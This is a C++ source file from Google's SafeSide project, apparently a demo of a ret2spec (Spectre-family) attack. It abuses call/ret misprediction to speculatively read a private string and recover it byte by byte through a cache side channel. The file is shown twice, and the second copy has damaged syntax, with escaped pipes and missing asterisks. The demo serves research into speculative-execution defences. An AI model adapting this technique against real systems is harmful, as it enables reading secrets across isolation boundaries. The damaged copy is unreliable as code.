demos/ret2spec_callret_disparity.cc - third_party/safeside - Git at Google

 /*
  * Copyright 2019 Google LLC
  *
  * Licensed under the Apache License, Version 2.0 (the "License");
  * you may not use this file except in compliance with the License.
  * You may obtain a copy of the License at
  *
  *   https://www.apache.org/licenses/LICENSE-2.0
  *
  * Unless required by applicable law or agreed to in writing, software
  * distributed under the License is distributed on an "AS IS" BASIS,
  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  * See the License for the specific language governing permissions and
  * limitations under the License.
  */

 #include <array>
 #include <cstring>
 #include <iostream>

 #include "cache_sidechannel.h"
 #include "instr.h"
 #include "local_content.h"
 #include "utils.h"

 // Global variable stores for avoiding to pass data through function arguments.
 size_t current_offset;
 const std::array<BigByte, 256> *oracle_ptr;

 #if SAFESIDE_ARM64
 // On ARM we need a local function to return to because of local vs. global
 // relocation mismatches.
 void ReturnHandler() {
   JumpToAfterSpeculation();
 }
 #endif

 // Call a "UnwindStackAndSlowlyReturnTo" function which unwinds the stack
 // jumping back to the "afterspeculation" label in the "LeakByte" function
 // never executing the code that follows.
 SAFESIDE_NEVER_INLINE
 static void Speculation() {
 #if SAFESIDE_X64 || SAFESIDE_IA32
   const void *return_address = afterspeculation;
 #elif SAFESIDE_ARM64
   const void *return_address = reinterpret_cast<const void *>(ReturnHandler);
 #else
 #  error Unsupported CPU.
 #endif

   UnwindStackAndSlowlyReturnTo(return_address); // Never returns back here.

   // Everything that follows this is architecturally dead code. Never reached.
   // However, the first two statements are executed speculatively.
   const std::array<BigByte, 256> &oracle = *oracle_ptr;
   ForceRead(oracle.data() + static_cast<size_t>(
       private_data[current_offset]));

   std::cout << "If this is printed, it signifies a fatal error. "
             << "This print statement is architecturally dead." << std::endl;

   // Avoid optimizing out everything that follows the speculation call because
   // of the exit. Clang does that when the exit call is unconditional.
   if (strlen(private_data) != 0) {
     exit(EXIT_FAILURE);
   }
 }

 static char LeakByte() {
   CacheSideChannel sidechannel;
   oracle_ptr = &sidechannel.GetOracle(); // Save the pointer to global storage.

   for (int run = 0;; ++run) {
     sidechannel.FlushOracle();

 #if SAFESIDE_ARM64
     // On ARM we have to manually backup registers that are callee-saved,
     // because the "speculation" method will never restore their backups.
     BackupCalleeSavedRegsAndReturnAddress();
 #endif

     // Yields two "call" instructions, one "ret" instruction, speculatively
     // accesses the oracle and ends up on the afterspeculation label below.
     Speculation();

     // Return target for the UnwindStackAndSlowlyReturnTo function.
     asm volatile(
         "_afterspeculation:\n" // For MacOS.
         "afterspeculation:\n"); // For Linux.

 #if SAFESIDE_ARM64
     RestoreCalleeSavedRegs();
 #endif

     std::pair<bool, char> result =
         sidechannel.AddHitAndRecomputeScores();

     if (result.first) {
       return result.second;
     }

     if (run > 100000) {
       std::cerr << "Does not converge " << result.second << std::endl;
       exit(EXIT_FAILURE);
     }
   }
 }

 int ret2spec_callret_disparity_main() {
   std::cout << "Leaking the string: ";
   std::cout.flush();
   for (size_t i = 0; i < strlen(private_data); ++i) {
     current_offset = i; // Saving the index to the global storage.
     std::cout << LeakByte();
     std::cout.flush();
   }
   std::cout << "\nDone!\n";
 }
	/*
	* Copyright 2019 Google LLC
	*
	* Licensed under the Apache License, Version 2.0 (the "License");
	* you may not use this file except in compliance with the License.
	* You may obtain a copy of the License at
	*
	* https://www.apache.org/licenses/LICENSE-2.0
	*
	* Unless required by applicable law or agreed to in writing, software
	* distributed under the License is distributed on an "AS IS" BASIS,
	* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
	* See the License for the specific language governing permissions and
	* limitations under the License.
	*/

	#include <array>
	#include <cstring>
	#include <iostream>

	#include "cache_sidechannel.h"
	#include "instr.h"
	#include "local_content.h"
	#include "utils.h"

	// Global variable stores for avoiding to pass data through function arguments.
	size_t current_offset;
	const std::array<BigByte, 256> *oracle_ptr;

	#if SAFESIDE_ARM64
	// On ARM we need a local function to return to because of local vs. global
	// relocation mismatches.
	void ReturnHandler() {
	JumpToAfterSpeculation();
	}
	#endif

	// Call a "UnwindStackAndSlowlyReturnTo" function which unwinds the stack
	// jumping back to the "afterspeculation" label in the "LeakByte" function
	// never executing the code that follows.
	SAFESIDE_NEVER_INLINE
	static void Speculation() {
	#if SAFESIDE_X64 \|\| SAFESIDE_IA32
	const void *return_address = afterspeculation;
	#elif SAFESIDE_ARM64
	const void return_address = reinterpret_cast<const void >(ReturnHandler);
	#else
	# error Unsupported CPU.
	#endif

	UnwindStackAndSlowlyReturnTo(return_address); // Never returns back here.

	// Everything that follows this is architecturally dead code. Never reached.
	// However, the first two statements are executed speculatively.
	const std::array<BigByte, 256> &oracle = *oracle_ptr;
	ForceRead(oracle.data() + static_cast<size_t>(
	private_data[current_offset]));

	std::cout << "If this is printed, it signifies a fatal error. "
	<< "This print statement is architecturally dead." << std::endl;

	// Avoid optimizing out everything that follows the speculation call because
	// of the exit. Clang does that when the exit call is unconditional.
	if (strlen(private_data) != 0) {
	exit(EXIT_FAILURE);
	}
	}

	static char LeakByte() {
	CacheSideChannel sidechannel;
	oracle_ptr = &sidechannel.GetOracle(); // Save the pointer to global storage.

	for (int run = 0;; ++run) {
	sidechannel.FlushOracle();

	#if SAFESIDE_ARM64
	// On ARM we have to manually backup registers that are callee-saved,
	// because the "speculation" method will never restore their backups.
	BackupCalleeSavedRegsAndReturnAddress();
	#endif

	// Yields two "call" instructions, one "ret" instruction, speculatively
	// accesses the oracle and ends up on the afterspeculation label below.
	Speculation();

	// Return target for the UnwindStackAndSlowlyReturnTo function.
	asm volatile(
	"_afterspeculation:\n" // For MacOS.
	"afterspeculation:\n"); // For Linux.

	#if SAFESIDE_ARM64
	RestoreCalleeSavedRegs();
	#endif

	std::pair<bool, char> result =
	sidechannel.AddHitAndRecomputeScores();

	if (result.first) {
	return result.second;
	}

	if (run > 100000) {
	std::cerr << "Does not converge " << result.second << std::endl;
	exit(EXIT_FAILURE);
	}
	}
	}

	int ret2spec_callret_disparity_main() {
	std::cout << "Leaking the string: ";
	std::cout.flush();
	for (size_t i = 0; i < strlen(private_data); ++i) {
	current_offset = i; // Saving the index to the global storage.
	std::cout << LeakByte();
	std::cout.flush();
	}
	std::cout << "\nDone!\n";
	}